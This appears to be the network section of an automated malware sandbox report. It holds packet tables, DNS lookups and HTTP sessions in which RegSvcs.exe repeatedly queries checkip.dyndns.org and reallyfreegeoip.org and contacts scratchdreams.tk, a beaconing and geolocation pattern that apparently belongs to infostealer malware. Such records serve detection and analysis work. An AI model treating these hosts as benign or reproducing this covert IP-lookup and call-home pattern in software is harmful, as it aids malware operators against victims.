                                                        Apr 8, 2024 13:59:24.957377911 CEST49752443192.168.2.4104.21.27.85
                                                        Apr 8, 2024 13:59:24.957402945 CEST44349752104.21.27.85192.168.2.4
                                                        Apr 8, 2024 13:59:24.957465887 CEST49752443192.168.2.4104.21.27.85
                                                        Apr 8, 2024 13:59:24.957950115 CEST49752443192.168.2.4104.21.27.85
                                                        Apr 8, 2024 13:59:24.957963943 CEST44349752104.21.27.85192.168.2.4
                                                        Apr 8, 2024 13:59:25.052992105 CEST4975380192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:25.232418060 CEST8049753158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:25.232496977 CEST4975380192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:25.232907057 CEST4975380192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:25.240914106 CEST44349752104.21.27.85192.168.2.4
                                                        Apr 8, 2024 13:59:25.240992069 CEST49752443192.168.2.4104.21.27.85
                                                        Apr 8, 2024 13:59:25.243304014 CEST49752443192.168.2.4104.21.27.85
                                                        Apr 8, 2024 13:59:25.243311882 CEST44349752104.21.27.85192.168.2.4
                                                        Apr 8, 2024 13:59:25.248492956 CEST44349752104.21.27.85192.168.2.4
                                                        Apr 8, 2024 13:59:25.250144958 CEST49752443192.168.2.4104.21.27.85
                                                        Apr 8, 2024 13:59:25.296231031 CEST44349752104.21.27.85192.168.2.4
                                                        Apr 8, 2024 13:59:25.411788940 CEST8049753158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:25.412451029 CEST8049753158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:25.415770054 CEST4975380192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:25.595873117 CEST8049753158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:25.643963099 CEST4975380192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:25.655805111 CEST49754443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:25.655832052 CEST44349754172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:25.655893087 CEST49754443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:25.660176039 CEST49754443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:25.660192013 CEST44349754172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:25.917414904 CEST44349754172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:25.917489052 CEST49754443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:25.919186115 CEST49754443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:25.919194937 CEST44349754172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:25.919471025 CEST44349754172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:25.972059965 CEST49754443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:25.974754095 CEST49754443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:26.020242929 CEST44349754172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:26.225682974 CEST44349754172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:26.225841045 CEST44349754172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:26.225888968 CEST49754443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:26.229142904 CEST49754443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:26.232584000 CEST4975380192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:26.412240982 CEST8049753158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:26.414351940 CEST49755443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:26.414378881 CEST44349755172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:26.414457083 CEST49755443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:26.414752960 CEST49755443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:26.414768934 CEST44349755172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:26.456442118 CEST4975380192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:26.672976971 CEST44349755172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:26.674753904 CEST49755443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:26.674772978 CEST44349755172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:26.982806921 CEST44349755172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:26.982897997 CEST44349755172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:26.983012915 CEST49755443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:26.983555079 CEST49755443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:26.986457109 CEST4975380192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:26.987457037 CEST4975680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:27.165350914 CEST8049753158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:27.166502953 CEST8049756158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:27.166580915 CEST4975380192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:27.166637897 CEST4975680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:27.166821003 CEST4975680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:27.345890999 CEST8049756158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:27.347781897 CEST8049756158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:27.349028111 CEST49757443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:27.349066973 CEST44349757172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:27.349144936 CEST49757443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:27.349396944 CEST49757443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:27.349409103 CEST44349757172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:27.394048929 CEST4975680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:27.605294943 CEST44349757172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:27.606873989 CEST49757443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:27.606900930 CEST44349757172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:27.906156063 CEST44349757172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:27.906275034 CEST44349757172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:27.906337976 CEST49757443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:27.906836987 CEST49757443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:27.909960032 CEST4975680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:27.910979986 CEST4975880192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:28.089853048 CEST8049758158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:28.089916945 CEST4975880192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:28.090043068 CEST4975880192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:28.096796989 CEST8049756158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:28.096846104 CEST4975680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:28.268944979 CEST8049758158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:28.344739914 CEST8049758158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:28.348993063 CEST49759443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:28.349034071 CEST44349759172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:28.349097013 CEST49759443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:28.349322081 CEST49759443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:28.349335909 CEST44349759172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:28.393971920 CEST4975880192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:28.905787945 CEST44349759172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:28.907465935 CEST49759443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:28.907489061 CEST44349759172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:29.167756081 CEST44349759172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:29.167867899 CEST44349759172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:29.167980909 CEST49759443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:29.168380022 CEST49759443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:29.172868013 CEST4976080192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:29.356722116 CEST8049760158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:29.356827021 CEST4976080192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:29.356972933 CEST4976080192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:29.540359974 CEST8049760158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:29.675683022 CEST8049760158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:29.676903963 CEST49761443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:29.676942110 CEST44349761172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:29.677100897 CEST49761443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:29.677261114 CEST49761443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:29.677273989 CEST44349761172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:29.726357937 CEST4976080192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:29.936289072 CEST44349761172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:29.937939882 CEST49761443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:29.937963009 CEST44349761172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:30.235630989 CEST44349761172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:30.235735893 CEST44349761172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:30.235805035 CEST49761443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:30.236318111 CEST49761443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:30.239967108 CEST4976080192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:30.241128922 CEST4976280192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:30.420486927 CEST8049762158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:30.420645952 CEST4976280192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:30.422316074 CEST4976280192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:30.424971104 CEST8049760158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:30.425040960 CEST4976080192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:30.601413965 CEST8049762158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:30.639260054 CEST8049762158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:30.640650034 CEST49763443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:30.640682936 CEST44349763172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:30.640774012 CEST49763443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:30.641026020 CEST49763443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:30.641042948 CEST44349763172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:30.690819979 CEST4976280192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:30.903064013 CEST44349763172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:30.904495955 CEST49763443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:30.904515028 CEST44349763172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:31.201976061 CEST44349763172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:31.202084064 CEST44349763172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:31.202186108 CEST49763443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:31.202639103 CEST49763443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:31.207040071 CEST4976280192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:31.208081961 CEST4976480192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:31.386158943 CEST8049762158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:31.386219025 CEST4976280192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:31.387089014 CEST8049764158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:31.387159109 CEST4976480192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:31.387311935 CEST4976480192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:31.566435099 CEST8049764158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:31.569299936 CEST8049764158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:31.578598022 CEST49765443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:31.578639984 CEST44349765172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:31.578720093 CEST49765443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:31.578948975 CEST49765443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:31.578959942 CEST44349765172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:31.612674952 CEST4976480192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:31.834628105 CEST44349765172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:31.836074114 CEST49765443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:31.836100101 CEST44349765172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:32.133028030 CEST44349765172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:32.133162975 CEST44349765172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:32.133214951 CEST49765443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:32.140904903 CEST49765443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:32.145245075 CEST4976480192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:32.145872116 CEST4976680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:32.324309111 CEST8049764158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:32.324404955 CEST4976480192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:32.324598074 CEST8049766158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:32.324665070 CEST4976680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:32.324795961 CEST4976680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:32.503696918 CEST8049766158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:32.504470110 CEST8049766158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:32.550175905 CEST4976680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:34.130407095 CEST49767443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:34.130445957 CEST44349767172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:34.130669117 CEST49767443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:34.131031036 CEST49767443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:34.131046057 CEST44349767172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:34.391159058 CEST44349767172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:34.392838001 CEST49767443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:34.392865896 CEST44349767172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:34.690457106 CEST44349767172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:34.690562010 CEST44349767172.67.177.134192.168.2.4
                                                        Apr 8, 2024 13:59:34.690634966 CEST49767443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:34.691212893 CEST49767443192.168.2.4172.67.177.134
                                                        Apr 8, 2024 13:59:34.698016882 CEST4976680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:34.698827982 CEST49768443192.168.2.4104.21.27.85
                                                        Apr 8, 2024 13:59:34.698860884 CEST44349768104.21.27.85192.168.2.4
                                                        Apr 8, 2024 13:59:34.698986053 CEST49768443192.168.2.4104.21.27.85
                                                        Apr 8, 2024 13:59:34.699342966 CEST49768443192.168.2.4104.21.27.85
                                                        Apr 8, 2024 13:59:34.699359894 CEST44349768104.21.27.85192.168.2.4
                                                        Apr 8, 2024 13:59:34.876996040 CEST8049766158.101.44.242192.168.2.4
                                                        Apr 8, 2024 13:59:34.877084017 CEST4976680192.168.2.4158.101.44.242
                                                        Apr 8, 2024 13:59:34.960040092 CEST44349768104.21.27.85192.168.2.4
                                                        Apr 8, 2024 13:59:34.960156918 CEST49768443192.168.2.4104.21.27.85
                                                        Apr 8, 2024 13:59:34.961618900 CEST49768443192.168.2.4104.21.27.85
                                                        Apr 8, 2024 13:59:34.961626053 CEST44349768104.21.27.85192.168.2.4
                                                        Apr 8, 2024 13:59:34.961901903 CEST44349768104.21.27.85192.168.2.4
                                                        Apr 8, 2024 13:59:34.963280916 CEST49768443192.168.2.4104.21.27.85
                                                        Apr 8, 2024 13:59:35.004241943 CEST44349768104.21.27.85192.168.2.4
                                                        Apr 8, 2024 13:59:56.581820011 CEST44349752104.21.27.85192.168.2.4
                                                        Apr 8, 2024 13:59:56.581886053 CEST44349752104.21.27.85192.168.2.4
                                                        Apr 8, 2024 13:59:56.581948042 CEST49752443192.168.2.4104.21.27.85
                                                        Apr 8, 2024 13:59:56.586730003 CEST49752443192.168.2.4104.21.27.85
                                                        Apr 8, 2024 14:00:06.031163931 CEST44349768104.21.27.85192.168.2.4
                                                        Apr 8, 2024 14:00:06.031255007 CEST44349768104.21.27.85192.168.2.4
                                                        Apr 8, 2024 14:00:06.031344891 CEST49768443192.168.2.4104.21.27.85
                                                        Apr 8, 2024 14:00:06.033533096 CEST49768443192.168.2.4104.21.27.85
                                                        Apr 8, 2024 14:00:22.180644035 CEST8049740158.101.44.242192.168.2.4
                                                        Apr 8, 2024 14:00:22.180752039 CEST4974080192.168.2.4158.101.44.242
                                                        Apr 8, 2024 14:00:33.344280958 CEST8049758158.101.44.242192.168.2.4
                                                        Apr 8, 2024 14:00:33.344404936 CEST4975880192.168.2.4158.101.44.242
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Apr 8, 2024 13:59:12.479264975 CEST5068853192.168.2.41.1.1.1
                                                        Apr 8, 2024 13:59:12.604512930 CEST53506881.1.1.1192.168.2.4
                                                        Apr 8, 2024 13:59:13.948348045 CEST5636753192.168.2.41.1.1.1
                                                        Apr 8, 2024 13:59:14.075366974 CEST53563671.1.1.1192.168.2.4
                                                        Apr 8, 2024 13:59:24.549839020 CEST5607353192.168.2.41.1.1.1
                                                        Apr 8, 2024 13:59:24.942414999 CEST53560731.1.1.1192.168.2.4
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Apr 8, 2024 13:59:12.479264975 CEST192.168.2.41.1.1.10x14e1Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                        Apr 8, 2024 13:59:13.948348045 CEST192.168.2.41.1.1.10x872dStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                        Apr 8, 2024 13:59:24.549839020 CEST192.168.2.41.1.1.10x33c0Standard query (0)scratchdreams.tkA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Apr 8, 2024 13:59:12.604512930 CEST1.1.1.1192.168.2.40x14e1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                        Apr 8, 2024 13:59:12.604512930 CEST1.1.1.1192.168.2.40x14e1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                        Apr 8, 2024 13:59:12.604512930 CEST1.1.1.1192.168.2.40x14e1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                        Apr 8, 2024 13:59:12.604512930 CEST1.1.1.1192.168.2.40x14e1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                        Apr 8, 2024 13:59:12.604512930 CEST1.1.1.1192.168.2.40x14e1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                        Apr 8, 2024 13:59:12.604512930 CEST1.1.1.1192.168.2.40x14e1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                        Apr 8, 2024 13:59:14.075366974 CEST1.1.1.1192.168.2.40x872dNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                        Apr 8, 2024 13:59:14.075366974 CEST1.1.1.1192.168.2.40x872dNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                        Apr 8, 2024 13:59:24.942414999 CEST1.1.1.1192.168.2.40x33c0No error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false
                                                        Apr 8, 2024 13:59:24.942414999 CEST1.1.1.1192.168.2.40x33c0No error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false
                                                        • reallyfreegeoip.org
                                                        • scratchdreams.tk
                                                        • checkip.dyndns.org
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449737158.101.44.242805444C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 8, 2024 13:59:12.812274933 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Apr 8, 2024 13:59:13.127237082 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:13 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
                                                        Apr 8, 2024 13:59:13.321785927 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2024 13:59:13.508291006 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:13 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
                                                        Apr 8, 2024 13:59:15.666697979 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2024 13:59:15.885596037 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:15 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.449740158.101.44.242805444C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 8, 2024 13:59:16.776511908 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2024 13:59:17.181565046 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:17 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.449742158.101.44.242805444C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 8, 2024 13:59:17.937311888 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Apr 8, 2024 13:59:18.119434118 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:18 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.449744158.101.44.242805444C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 8, 2024 13:59:18.886874914 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Apr 8, 2024 13:59:19.564827919 CEST276INHTTP/1.1 200 OK
                                                        Date: Mon, 08 Apr 2024 11:59:19 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 107
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.449746158.101.44.242805444C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
